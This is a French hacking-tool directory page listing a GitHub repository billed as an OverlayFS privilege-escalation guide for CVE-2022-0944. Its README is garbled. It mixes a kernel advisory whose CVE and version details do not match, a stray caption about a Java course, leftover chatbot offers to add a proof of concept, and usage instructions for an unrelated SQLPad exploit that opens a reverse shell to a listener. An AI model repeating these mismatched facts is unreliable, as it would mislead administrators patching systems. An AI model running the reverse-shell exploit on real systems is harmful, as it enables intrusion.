Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
OverlayFS-PrivEsc-CVE-2022-0944 — Guide d'exploitation et d'atténuation pour CVE-2022-0944, une vulnérabilité d'élévation de privilèges du noyau Linux dans OverlayFS, avec des scripts de détection et des instructions de correction. | Kitploit
Outils/GitHubGitHub/artemisxxx37/overlayfs-privesc-cve-2022-0944
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationApprentissage et Éducation
GitHubartemisxxx37/overlayfs-privesc-cve-2022-0944

OverlayFS-PrivEsc-CVE-2022-0944

Guide d'exploitation et d'atténuation pour CVE-2022-0944, une vulnérabilité d'élévation de privilèges du noyau Linux dans OverlayFS, avec des scripts de détection et des instructions de correction.

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
1il y a 1 anPas encore vérifié

CVE-2022-0944 : Vulnérabilité d'élévation de privilèges dans OverlayFS 🛡️

CVE Severity

Avis de sécurité et guide d'atténuation pour la vulnérabilité d'élévation de privilèges du noyau Linux dans OverlayFS.

📜 Aperçu

CVE-2022-0944 est une vulnérabilité de sécurité dans le sous-système OverlayFS du noyau Linux qui permet à un attaquant local d'élever ses privilèges via une gestion inappropriée de la création de fichiers dans des configurations spécifiques.

📌 Détails techniques

Screenshot 2025-03-26 at 17-15-46 i got published a course for java for beginners unfortunally i don't have a redame file to guide through

🚨 Impact

Un attaquant local pourrait :

root@kitploit:~
Obtenir les privilèges root via des opérations sur des fichiers contrefaits
Contourner les restrictions de sécurité
Modifier des fichiers système sensibles
Compromettre l'intégrité complète du système

🔍 Détection

  1. Vérifier la version du noyau uname -r

Versions affectées : 5.8 <= noyau < 5.16.12

  1. Vérifier l'utilisation d'OverlayFS mount | grep overlay

Les systèmes utilisant des montages OverlayFS sont à risque

  1. Consulter les avis de sécurité

Pour Debian/Ubuntu :

root@kitploit:~
grep CVE-2022-0944 /var/log/apt/history.log

# Pour RHEL/CentOS :
rpm -q --changelog kernel | grep CVE-2022-0944

4.🛡️ Atténuation

Correctifs officiels

Mettez à jour vers l'une de ces versions corrigées :

root@kitploit:~
Noyau Linux 5.16.12 ou ultérieur
Correctifs rétroportés spécifiques au fournisseur

Commande de mise à jour :

Ubuntu/Debian

sudo apt update && sudo apt upgrade linux-image-$(uname -r)

RHEL/CentOS

sudo yum update kernel

Solutions de contournement (si le correctif n'est pas immédiat)

root@kitploit:~
Restreindre l'utilisation d'OverlayFS :
  sudo modprobe -r overlay

Imposer des restrictions d'espace de noms :
# Créer un espace de noms utilisateur non privilégié unshare -Ur

root@kitploit:~
    # Monter avec des restrictions utilisateur
    mount -t overlay -o lowerdir=/lower,upperdir=/upper,workdir=/work overlay /mnt

Appliquer des politiques SELinux/AppArmor : type=AVC msg=audit(1647452829.123:456): user pid=1234 comm="mount" scontext=user_u:user_r:user_t tcontext=system_u:object_r:unlabeled_t denied { mounton }

⚠️ Avertissement Ce document est fourni à titre informatif uniquement. Bien que des efforts aient été faits pour assurer l'exactitude, aucune garantie n'est offerte. Testez toujours les correctifs dans un environnement de développement avant tout déploiement en production.

Dernière mise à jour : 2023-10-01 | Voir le journal des modifications

Fonctionnalités clés :

  1. Classification claire des vulnérabilités avec badges de sécurité
  2. Tableau de référence rapide des détails techniques
  3. Étapes de détection et d'atténuation exploitables
  4. Commandes de mise à jour spécifiques au fournisseur
  5. Exemples de politiques de sécurité (SELinux/AppArmor)
  6. Liens de référence officiels
  7. Conformité aux normes de divulgation des vulnérabilités

Ce format README convient à :

  • Équipes de sécurité
  • Administrateurs système
  • Ingénieurs DevOps
  • Mainteneurs open-source
  • Bases de données de vulnérabilités

Souhaitez-vous que je :

  1. Ajoute des informations spécifiques sur les correctifs des fournisseurs ?
  2. Inclue des détails de preuve de concept d'exploitation (avec prudence) ?
  3. Ajoute d'autres scripts de détection ?
  4. Personnalise pour une distribution Linux spécifique ?

Utilisation

root@kitploit:~
usage: main.py [-h] url lhost lport [username] [password]

positional arguments:
  url         URL vers SQLPad
  lhost       Adresse hôte de l'écouteur pour le reverse shell
  lport       Port de l'écouteur pour le reverse shell
  username    nom d'utilisateur de connexion (optionnel)
  password    mot de passe de connexion (optionnel)

options:
  -h, --help  afficher ce message d'aide et quitter

Exemple :

root@kitploit:~
# installer les dépendances
pip install -r requirements.txt

# démarrer le conteneur docker sqlpad
docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:6.10.0

# déclencher l'exploit
./main.py http://localhost:3000 127.0.0.1 1337 admin admin

Avertissement

Ce dépôt contient du code et des outils destinés uniquement à des fins éducatives, spécifiquement pour une utilisation dans des cours de cybersécurité et des environnements d'apprentissage. L'auteur de ce code décline toute responsabilité quant aux conséquences découlant de l'utilisation, de la mauvaise utilisation ou de la modification de ce code. Le code est fourni "en l'état" sans aucune garantie, expresse ou implicite, y compris mais sans s'y limiter, les garanties implicites de qualité marchande ou d'adéquation à un usage particulier.

Télécharger l’outil